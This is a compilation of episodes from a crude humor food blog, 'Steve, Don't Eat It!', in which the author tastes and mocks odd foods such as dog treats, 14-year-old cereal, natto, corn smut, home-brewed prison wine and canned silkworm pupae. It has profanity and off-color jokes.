I think it 's fair to say it was everything you 'd expect from a sliver of briney fat .
It was also the only time in my life my brain formed the sentence : " I have a mouth full of cellulite . "
While I cannot endorse the eating of Pickled Pork Rinds , I do endorse playing with it like a puzzle .
I did have some fun trying to put the pig back together , but eventually that got boring as I lost the will to live .
I have a feeling Dolores and I are not done .
As long as she continues to market such treats as Pickled Pork Lips and the bewildering Chili Brick , I have no doubt she and I will do battle again .
Steve , Do n't Eat it !
Vol. 3
Beggin ' Strips Beggin ' Strips are bacon - shaped , bacon - flavored treats for dogs .
In the commercial a dog runs around the house like a maniac shouting BACON , BACON , BACON , BACON , BACON !
It 's weird , because I do the exact same thing .
Beggin ' Strips slogan is " Dogs do n't know it 's not bacon ! "
Newsflash : Dogs are retarded .
Mine used to eat his own vomit , and wag his tail while he did it .
I 'll be the one to decide if this stuff tastes like bacon or not .
I know these snacks are n't made for human consumption , but while I was in the store the ingredients list looked pretty tame so I was n't too concerned .
Somehow I had missed one extremely dubious word sitting there all by itself .
" MEAT " .
That 's all it says ... meat .
Meat is a pretty large umbrella .
Beef is meat .
Pork is meat .
Horses , monkeys , and allegedly Arby 's roast beef are meat .
Even Bea Arthur 's ball sack is meat .
Okay , maybe I 've gone too far .
I have no idea what that is they are serving at Arby 's , but you get my point .
Alas , there is no turning back now .
Despite the fact that I am a grown man with children , I 'm off to go eat dog food .
And what better way to have Beggin ' Strips than in a Beggin ' , Lettuce , and Tomato Sammich !
**********
********** I 'm back .
And I 'm sad to report that I did not run around the house yelling " Bacon ! " I did , however , run around the house yelling " Call 911 ! " GodDAMN these are foul .
Do n't try this at home .
I 'm not sure it 's safe , and I am sure your tongue may kill itself .
While they were a little too artificially colored red to pass for real bacon , I was pleased to see they were not all the same shape .
Similar to slices of real bacon , they each have their own curvy and shriveled identity .
( Just like my aunts and uncles . )
And somehow these Beggin ' Strips also managed to smell just like bacon .
Oopsie .
Typo .
I meant to say " the smoky puke of a thousand maniacs . "
To put it simply , this is the devil 's bacon .
Even a healthy dose of bread , mayo , lettuce and tomato could n't come close to masking the evil .
The bitter nastiness literally got worse with every chew , and I was overcome by the urge to go in the backyard and eat grass until it was all out of me .
The following is a message to all dogs who read The Sneeze : First , sit .
Sit !
Good boy .
Now listen to me .
Beggin ' Strips do NOT , I repeat , DO NOT TASTE LIKE BACON .
You are all being played for chumps !
Alright , now give me your paw .
Okay , roll over !
Good boy !
Now go take a steamy dump in your master 's shoe .
Go on !
Get !
In closing , the only silver lining to this dark dark cloud is I have figured out why so many dogs lick their own assholes .
They are trying to kill the taste of Beggin ' Strips .
( By the way , it does n't work . )
( All Steve , Do n't Eat It 's can be found here . )
Steve , Don't Eat It ! -- 1991 Urkel-Os
Years ago , my friend Lisa gave me an autographed box of Urkel - O's cereal .
It is signed : " To Steve -- God Bless , Jaleel White . "
I do n't know , but if I were God , I 'm not sure I 'd listen to Urkel .
In fact , I think my Godly response might be something like , " Hey , fuck you , Urkel .
Do n't tell me who to bless . "
Incidentally , I 'm not the " Steve " it was signed for .
Lisa found the box in a collectibles store , but that 's okay .
I do n't mind being a second - hand Steve .
I had always been a little creeped out that the cereal was still in the box since 1991 .
But the Urkel - Os are now 14 years old , and I am no longer creeped out .
I 'm psyched , because I realized what I have in my possession is not just a box of old cereal ( and possibly some larvae ) , but a chance to taste history .
This particular box of Urkel - O's is unique because it 's some kind of weird sales sample , and has " marketing features and benefits " on the back .
One of the " features " is actually listed as : Fun , circle - shaped product .
I had no idea circles were so fun .
At least now I know what to get the kids next Christmas .
A fucking circle .
I 'd also like to point out , that the cereal itself does n't have a single thing to do with Urkel .
It 's just strawberry and banana flavored rings .
If there was an episode where Urkel lost his virginity to a strawberry flavored ring , I missed it .
You'd think for a celebrity tie - in , they 'd at least make half an effort to actually " tie " it in to something .
Even if they just connected the loops together , I 'd buy that they were supposed to be Urkel 's glasses .
In fact , C3 PO 's cereal would have been a better Urkel - O's -- look at 'em .
Come to think of it , what the hell were C3 P0 's supposed to be anyway ?
His eyes ?
That there is some jedi bullshit .
Well , it 's cereal time , and I 'm gonna go eat me a big ol ' bowl of 1991 ...
********** **********
I 'm back , and I 'm not exactly sure how to say this , but ...
THE CEREAL IS STILL GOOD !
I swear to God .
I 'm a little freaked out .
Should I call the Pope ?
This is a miracle , right ?
I mean , I used to think the idea of suspended animation and cryogenics was pretty cool , but the hell with that .
If I die , do n't freeze my brain -- just bury me in a box of Urkel - O's .
Apparently it has the ability to stop time .
And what 's even more ridiculous is the milk I used was only 2 days past the expiration date , and it tasted funkier than the cereal .
( Which , by the way , was only 4,380 days past its expiration date . )
My wife does n't like it when I eat potentially life - threatening stuff .
I do n't know what her problem is .
Maybe she 's just afraid to raise our children alone .
What a baby .
When I told her that the cereal was still good , she was amazed for a moment and then she said , " Good .
Now you can throw it away . "
Throw it away ?!
She 's a loon .
I told her I 'm putting it right back in the box so I can try eating it again in six years when it turns 20 .
It looks like this episode of Steve , Do n't Eat It has a happy ending .
Although , I am glad Urkel signed the box " God Bless . "
I may need it in heaven tonight , after I die from strawberry - flavored maggots hatching in my rectum .
( All Steve , Do n't Eat It 's can be found here . )
Steve , Do n't Eat It !
Vol. 5
Breast Milk Until now , the foods I 've sampled for this section have all come from the supermarket .
Then one day I realized that a perfectly viable " Steve Don't Eat It " candidate has been sitting right under my nose for months .
Right in my very own refrigerator .
And it came right out of my wife !
No , I 'm not talking about that giant cucumber , perv .
I 'm talking about breast milk .
That 's right .
And not just a little drop off the odd finger , but a genuine slug of freshly - pumped wife juice .
( I 'll go ahead and ignore the shiver I just got , and keep typing . )
Thinking about actually drinking breast milk has caused me to ponder the question :
Is it not weirder to drink cow 's milk which is truly intended for baby cows ?
The answer :
Hell no !
The only thing weirder than me drinking breast milk , is the fact that milk is coming out of my wife 's chest in the first place .
It sure as hell did n't do that when I met her .
I 'm telling you , the whole thing is lunacy .
I love my wife , but does she really have to be such a mammal ?
Okay , I have put this off long enough .
The time has come .
I 'm off to The Booby Bar to see what they 've got on tap ...
Oh , where do I begin ?
Well , I did feel the need to find the appropriate glass .
Drinking it from a baby bottle seemed too on the nose ( not to mention too creepy ) , and I did n't have enough milk to justify a martini glass .
( Although with a splash of Bailey 's I suppose you 'd have yourself a nice " Nippletini . " )
Luckily the " Dumbass Website Gods " smiled down upon me .
I came across the only shot glass we happened to have in the house , and it was actually from Wisconsin -- The Milk State !
I must admit that my aversion to drinking breast milk is something of a double - standard .
Let me try to put this as delicately as I can out of respect to my female readers ... but some women have been known to willingly " ingest " a certain dubious " body fluid " made by men , during moments of " intimacy . "
( These moments are known as " blow jobs . "
These women are known as " awesome . " )
Nevertheless , I could n't bring myself to just do the whole shot at once , so I started out with a little girly sip .
And the truth is it 's not that bad at all .
It tastes like milk , just slightly more sweet .
And mentally , just slightly more making me want to gargle with Clorox and assume the fetal position while I question my life .
Now , while I may have issues with drinking this stuff , I have been a huge fan of its packaging for years .
You may be interested to know that breast milk is now available in a variety of convenient sizes : from the portable , half - pint container ... to the more economical one gallon jugs .
To make things more interesting , and a little bit easier on myself , I decided to break out the Hershey 's syrup and whip up some chocolate breast milk .
This time I just knocked the shot right back , and two words immediately came to mind : Yoo Hoo .
It tasted just like good ol ' Yoo Hoo .
I almost want to say that drinking breast milk is n't so bad , except the other two - word phrases that also came to mind were " stomach pump " and " kill me . "
I 'm officially leaving all future breast milk drinking in the capable hands of my baby boy -- the one guy who now gets to second base with my wife way more than I do .
But , I do n't mind .
I love that little asshole .
( All volumes of Steve , Do n't Eat It can be found here . )
Steve , Do n't Eat It !
Vol. 6
Natto I recently came across a container of fermented soybeans in the supermarket .
I do n't mean an old container of soybeans some stockboy forgot to toss .
These are fermented - on - purpose soybeans from Japan .
That 's what Natto is .
I remembered hearing about this stuff on Iron Chef one time when it was the secret ingredient .
The judges in the show were commenting on what a great job the chefs had done to " supress the smell " of the natto .
I 'm no Iron Chef , but I 've got a clever way to supress the smell .
Do n't put it in your fucking food .
I might not win " Battle Natto , " but I promise you my dinner wo n't smell like stank - ass soybeans .
I found it slightly unsettling that the sealed styrofoam container had creepy little airholes in it .
As if what was inside needed to breathe .
I dared to lift the lid , which made me regret that I needed to breathe .
The natto was coated in some kind of sick slime and had the complex yet playful aroma of a dumpster in July .
Actually , the little pile inside looked kinda like baked beans .
It also smelled kinda like baked beans .
If they were baked in the filthy heat of Satan 's asshole .
This particular batch was made by a company in Japan called Shirakiku .
I have n't been able to determine if Shirakiku is a food manufacturer , or just a store that sells gag gifts and practical jokes .
It might be both .
Not unlike Michael Jackson , these harmless soybeans had undergone some kind of hideous transformation .
They were now a freakish version of their former selves .
( Which , coincidentally , should also be kept away from your children . )
The most disturbing aspect of this stuff is it seems to get " activated " when you stir it .
What I mean by this is , ( and I may actually weep , but ... ) the slimy coating on the beans develops into stringy , stretchy , marshmallow - like strands that will forever haunt my dreams .
Basically , if you move it back and forth enough , you 're left with a gross , sticky mess .
( Hey , natto and I have at least one thing in common ! )
And now that I think about it , that 's exactly what it looks like the pranksters back at Shirakiku did into my beans .
You guuuys !
I force - fed myself a big ol ' spoonful , and found it to be slightly rancid and extremely bitter .
Unfortunately , swallowing did n't help dissipate the flavor because the strings of bean jizz melted , coating my mouth and lips with a glistening sheen of sadness .
The entire experience is difficult to describe , but if you can remember back to the very first time you made out with a hobo's ass , it 's a lot like that .
What I find most hilarious is that there is an expiration date on the package .
What could they possibly expect to happen to the product on this date THAT HAS NOT ALREADY OCCURRED ?!!!
Also , nestled in this mound of compost was a li'l packet of mustard .
In its place , I would strongly suggest a written apology .
I do have one last theory about the date on the package .
It may be an expiration date , but not for the beans .
If you finish the container , that 's the day you die .
( All episodes of " Steve , Don't Eat It ! " can be found here . )
Steve , Do n't Eat It !
Vol. 7
Cuitlacoche Cuitlacoche is a black fungus that infects corn fields , making the kernels bulbous and swollen as they fill with spores .
It also goes by the name Huitlacoche .
If you 're having trouble with the pronounciation , it 's : Cuitlacoche ( kweet - lah - KOH- chay ) or Huitlacoche ( dat- sfuckin - NAS - tee ) .
It 's safe to say this is the first time I 've ever paid for an infection .
I am , of course , not counting the one I got from your mother .
( YES !
You walked right into that . )
I 've read that U.S. farmers consider it a disease and destroy it .
Farmers in Mexico put it in cans and sell it as a delicacy .
I travelled far and wide to find my own precious can of Cuitlacoche .
Okay , it was at my supermarket , but I had to drive like two miles to get there and got stuck at a couple of lights .
Enough chit-chat .
I 'm gonna go dine on a can of disease .
But before I do , I really do feel bad about that cheap mother joke .
My sincere apologies to you and your lovely mom .
( The filthy whore . )
Be right back !
Oh , sweet Christ .
Visually , I think the bar for Steve , Do n't Eat It ! is about to be set at a new low .
So I 'm going to ease you people into this one .
Let 's begin with a single spore - filled kernel before we examine the entire contents .
The following picture is a swear - to - God - unretouched - side - by - side comparison of a normal kernel of corn and an infected huitlacoche kernel , both from the same can .
These results can also be achieved by bombarding a kernel of corn with gamma rays and then making it angry .
( But be warned .
You wo n't like it when it 's angry . )
Alright , you 've waited long enough .
Presenting the entire can of imported sludge ( that I was actually charged money for ) ...
Do n't worry , I checked the ingredients before I tasted it .
" Smoker 's lung " was not on there .
Before I even got the whole can open , I detected a vague aroma of sweet corn , along with what I can only describe as a deep musky funk .
Put 'em together and it smells like corn that forgot to wipe .
In just a single serving , you 'll experience a wide array of textures .
Without getting too gross , it 's because the disease is more advanced in some kernels than others .
One bite might be kinda chewy , while the next might burst in your mouth like a black pus-filled blister .
( Whoops , forgot about the not - too - gross thing .
Oh well .
Nuts to you ! )
So , how does Huitlacoche taste ?
Does it matter ??
LOOK AT IT !
I guess it would be fair to say it does n't taste as truly horrible as it looks .
The flavor is elusive and difficult to describe , but I 'll try : " Kinda yucky . "
Hey , that was n't so hard after all .
( Sometimes I forget I 'm a goddamn wordsmith . )
For any connoisseurs , I 'm not sure if this stuff would go better with red wine or white .
How about with a bottle of Bactine ?
I 've always found that goes great with infections .
Huitlacoche also goes by some other names .
It 's frequently called Maize Mushroom , Corn Smut , and Mexican Truffle .
I 've even heard it referred to as " Devil Poop " -- but that was only after I said it .
( For God 's sake , it comes with little bits of corn already in it !
Talk about a time - saver . )
I thought it was interesting that Monteblanco chose to make their company logo the focal point of the can .
I also found a can of huitlacoche from Goya .
They , too , have downplayed the visuals by hiding it in a mild - mannered burrito .
I went ahead and made a new can label for the gang back at Cuitlacoche Central .
As always , this is a free service .
Well , that brings us to the end of a long overdue Steve , Do n't Eat It !
And now I have a belly full of diseased corn .
Maybe I should go see a doctor about a penicillin shot .
For your mom .
( YES !
In your face !
Oh man ... )
All Steve , Do n't Eat Its can be found here .
Follow me on Twitter RIGHT HERE .
Steve , Do n't Eat It !
Vol. 8
Prison Wine I 'm simply not cut out for jail .
Where I really shine is watching Tivo on a couch .
As soon as you need me to survive a sharpened - spoon attack , ( or even a regular spoon attack ) -- I 'm just not your guy .
Nevertheless , if I do ever end up in the big house , there 's a chance I 'll make it out alive as the prison brewmeister .
I know this for I have read the 1994 book " You Are Going To Prison " by Jim Hogshire .
( Well , I actually only skimmed through the book , so I 'll probably be dead in a day and a half . )
The following book excerpt contains the prison wine recipe ...
" Prison hooch can be made in your cell toilet ( as long as you do n't mind using other people 's toilets or finding some other solution ) , or more often , in plastic trash bags .
The recipe is simple : make a strong bag by double or triple - bagging some plastic trash bags and knotting the bottoms .
Into this , pour warm water , some fruit or fruit juice , raisins or tomatoes , yeast , and as much sugar as you can get ahold of ( or powdered drink mix ) .
Now tie off the top of the bag , letting a tube of some kind protrude so the thing wo n't explode while it gives off carbon dioxide .
Now hide the bag somewhere and wait at least three days .
A week is enough .
One of the problems you have right away with making wine in prison is the difficulty getting yeast .
It 's a strictly forbidden item and you might not be able to get any .
In this case you can improvise the by using slices of bread , preferably moldy ( but not dry ) and preferably inside a sock for easier straining .
If you choose to brew your wine in your cell , you 'll need to hide it behind your bunk and do what you can to hide the smell .
Burning cinnamon as incense is one way .
Spraying deodorant around is another .
Normal wine takes at least a month if not six weeks to make at all properly -- but in hell , this is all you get . "
With that , I give you the longest , scrolliest , bandwidth destroyingest Steve , Do n't Eat It to date .
Phooey on you sobriety !
I 'm makin ' some hooch !
I gave serious thought to whether the straining sock should be clean or not .
I came to the conclusion that it should n't .
In the spirit of Steve , Do n't Eat It , I need to take it to the extreme !
Plus , I was already wearing dirty socks and my clean ones were in the bedroom , like 20 feet away .
Here are all the ingredients necessary .
I thought it would be nice to make both red and white prison wine to match well with whatever dishes the prison chef might prepare .
I 'm sure Martha Stewart did the same if / when she brewed this stuff in her cell toilet .
But she probably used a clean sock , being as she 's fancy .
Getting slightly moldy bread proved to be more difficult than I expected .
I bought the cheapest white bread I could find and waited for it to go green .
I swear to God it stayed good for a month .
Whenever I WANT bread in my house , it 's moldy .
Now that I actually needed it to happen , it would n't .
Luckily , I discovered an old green hot dog bun in a bag on top of the fridge and put that in with the bread to teach it the ways of the mold .
In this way , the green bun was Yoda .
It worked perfectly .
And it did n't even sound suspiciously like Grover .
It was finally time to begin the brewing process .
I reflected on the artisans around the world who 've dedicated their lives to the craft of winemaking , as I lovingly shoved moldy bread in my socks .
I decided to break up the two wine recipes thusly ...
The Red Prison Wine ( pictured above ) would be made with red grape juice , tomatoes , raisins , sugar , the dirty sock filled with moldy bread , and one packet of yeast .
( I thought it would be interesting to add yeast to one batch and not the other , and compare the results . )
As stated in the book , yeast is definitely contraband , but for the sake of this culinary experiment we 'll just assume I gave the prison baker a hand - job .
But then the guy would n't give me the yeast !
SO I STABBED HIM WITH A PEN IN THE EYE AND TOOK IT !
And I was all , " DON'T FUCK WITH STEVE ! " Yes .
This is what we should assume .
As for the White Prison Wine , it would contain :
White grape juice and the moldy bread sock .
No extra yeast added .
For the requisite sugar , I went with some powdered drink mix , a few packets of ketchup and a handful of Tigger fruit snacks .
Hmm ...
I can't put my finger on why , but I could swear these ingredients almost look at home in this garbage bag .
It must be the lighting .
( Incidentally , I realized I forgot to take a picture of this one with the grape juice , but then I remembered that 's okay because ... in Hell , this is all you get ! )
I knotted up the bags , poked a straw in the top as the recipe called for and tucked them away in our bathroom for safe keeping .
If you 're wondering why I did n't actually make this stuff in my toilet -- give me a break .
I 'm all too aware of my previous creations in that toilet .
Just be glad I 'm drinking moldy sock juice at all for you fuckers .
Within a day or two , the bathroom had taken on a strong sour smell .
That " bar at 4 AM " smell .
Everytime my wife went in there she complained about it .
Everytime I went in there I just had the urge to pick up a skank .
7 long days later it was time to crack open the bags and see what we had ...
I started with the red , and it somehow smelled amazingly good !
Like fresh , sweet grapes .
You know , there 's an old expression that says
In wine , there is truth .
In this case , I could also make out some chunks and what appeared to be a severed foot .
Then there was the " white " wine .
This one 's aroma was slightly more earthy .
Do you know that smell of grass right after it 's cut ?
That 's nice .
I was just making chit-chat , because this smelled like rotten eggs tucked into the anus of a dead cat .
I really do n't understand what could have gone wrong !
I used moldy bread and socks , EXACTLY LIKE THE RECIPE SAID !
I purchased two large decanters , carefully transferred my fruity after - birth into them , and brought it to my friends Anthony and Steve for a group tasting .
I did n't strain the red , just in case anybody wanted Prison Sangria .
First we sampled the red prison wine .
It was sour , but certainly not terrible .
And the good news was it was definitely wine ... like ... ish .
It was surprisingly dry .
All the sugar was gone .
Then again , if you were sugar , would you have stayed in that shitty - ass garbage bag ?
We were all pleasantly surprised .
Regarding Red Prison Wine Anthony : " I would drink this in prison . "
Steve : " I would drink this in high school ! "
It was time for the white .
Wine tasters refer to a wine 's aroma as its " nose . "
This wine 's nose was a rectum .
If this was n't wine , I had somehow stumbled upon the recipe for Prison Stink Bombs .
Forget about drinking it , I was afraid of getting it on me .
Through some miracle , it actually tasted nothing like it smelled .
In fact , there was very little flavor other than sour , watery alcohol .
It 's hard to believe this started out as a bag of fruit snacks and grape juice .
Yet somehow these ingredients went from sweet and child - like to harsh and alcoholic quicker than Lindsay Lohan .
Now that I think about it , prison inmates frequently turn to religion .
I 'm not very religious , but maybe I should be .
Sure , Jesus made wine from water , but I did it with a dirty sock and fruit snacks !
You tell me what the bigger miracle is .
And I 'm not even the son of God ... or am I ?
Out of curiousity , I purchased a device from a brewing supply house that allowed me to measure the wine 's alcohol content .
The red came in at 10.5 % alcohol .
The white was a whopping 14 % alcohol !
All of this led me to a simple conclusion : I miss old Lindsay Lohan , with the big boobies .
WARNING : Do n't try this yourself .
Brewing alcohol in unsterile conditions is an obvious health risk .
Stay safe , and leave the food stupidity to me .
Thanks .
( That goes for you too , Lohan . )
All episodes of Steve , Don't Eat It ! can be found here .
Purchase " You Are Going To Prison " here .
Steve , Do n't Eat It ! - Silkworm Pupas
Imagine a cute little silkworm all snug in his cocoon .
Perhaps his name is Arthur .
He rubs his tiny hands together and thinks , " Finally .
Tomorrow I get my wings ! "
Arthur drifts off to sleep with dreams of floating across a summer breeze ... until he 's unceremoniously slapped in a can , now destined to float through the intestines of a dumbass named Steve .
( Cue : comical trombone . )
And so begins Steve , Don't Eat It - Vol.
9 . Someone recently told me they do n't eat peanut butter because the FDA permits it to legally contain a certain amount of insect parts .
This person might not want to buy a can of Silkworm Pupas .
The amount of bugs in here is downright wacky .
The writing on the can is all in Korean .
It just so happens that I have a Korean aunt who was happy to provide a translation .
The big red letters say " Bun Dae Ki " or " Silkworm Snacks . "
Apparently " Snacks " is a very powerful word .
It 's all you need to transform any putrid item into a fun new treat .
The next time you see some kid go two knuckles deep in his nose and then consume the treasures within , do n't be grossed out .
He 's just enjoying some Booger Snacks !
I wo n't bore you with every word on the can , but I 'll hit the highlights ...
Any words in an oval demand attention .
The yellow oval on this can says " High Protein - Great side dish when drinking alcohol . "
I imagine this came from the silkworm marketing team when faced with the nagging question " Who the fuck 's gonna eat this ? ! "
The answer : DRUNKS !
On the back of the can is a list of bullet points .
One of them is : " Warning !
Some people may be allergic to silkworms , and get blotches or break out from eating the contents of this can . "
Luckily I can't read Korean , so I 'm good .
Sadly there is no " Serving Size " listed -- ruining my hopes that the serving size might be zero .
Alright , I 've stalled as long as I can .
It 's time for me to get pupified ...
I found it odd that the pull - tab was actually on the bottom of the can , until I realized this is just a time - saver for people who'd rather open it right over the garbage .
Below is a " beauty shot " of just one of the 106 pupae found in the can .
Mmmm .
Is it me , or does that penny suddenly look delicious ?
The silkworm pupas gave off a subtle , nutty aroma .
Not strong like my nuts after a weekend with no shower , just more like their usual , end - of - the - day twang .
These little guys only cost me 79 cents .
That 's a mere 0.7 cents per pupa .
Quite the bargain ... for a can of dead , turd - like moths ... in their own gravy ... why God ... WHY ??
The pile of moist cocoons looked so sad sitting there ( like so many piles of moist cocoons will ) that I decided to cheer them up .
Make 'em feel fancy !
One doily , some frilly toothpicks and a few dry heaves later , and I 'd say mission accomplished !
With pinky extended , I chose an an extra pupy one and popped it in my mouth .
The silkworm pupas did n't have a strong flavor .
In fact , they had the somewhat familiar flavor of bad canned peas .
With just a hint of mildew .
Overall , not terrible .
But what caught me off guard was the crunchy cocoon .
Silk my ass .
This was like chewing on tiny bones .
The good news is I was immediately distracted by the unexpected squirt of briny liquid that shot out into my mouth .
A little heads up would have been nice .
( Am I right , ladies ? )
Having gotten the tasting out of the way , I decided to conduct a miniature pupa autopsy .
Armed with an X - acto blade I carefully tried to peel away the cocoon to see what I could find .
What I found was , I have the knife skills of an epileptic monkey .
The cocoon just gave way to a mushy pile of moth guts .
Or as I like to call them , Moth Gut Snacks !
The best I could hope for was a clean split , right down the middle .
Which is ironic , because this type of cut is referred to as a " butterfly . "
( See , cuz it 's a caterpillar ... and the cocoon with the ... thing ...
Look I did n't say it was funny , I said it was ironic .
Get off my back , alright ?
What did I do to you ?!)
That X - Acto would go so nicely across my wrists just about now .
All of this reminded me of something I had seen in one of my sons ' board books .
After a bit of searching I found it in the next to last page of " The Very Hungry Caterpillar . "
At the end of the story the little guy emerges as a beautiful butterfly and the transformation is complete .
Please note the hole in the page .
That was chewed there by my son .
I used to think he did it because he was teething .
Now I know he was just trying to eat the butterfly , and he takes after his daddy .
That 's my boy !
Alright , I 'm gonna go get loaded .
Who am I to disobey an oval ?
But before I do , I 've been feeling bad about our pal Arthur .
Since he gave his life in the name of Steve , Do n't Eat It , I thought it would be nice to give him the gift of flight after all .
Go Artie , go !
Fly and be free !
( All volumes of Steve , Don't Eat It ! can be found here . )
Steve , Do n't Eat It ! - The Tree Brain
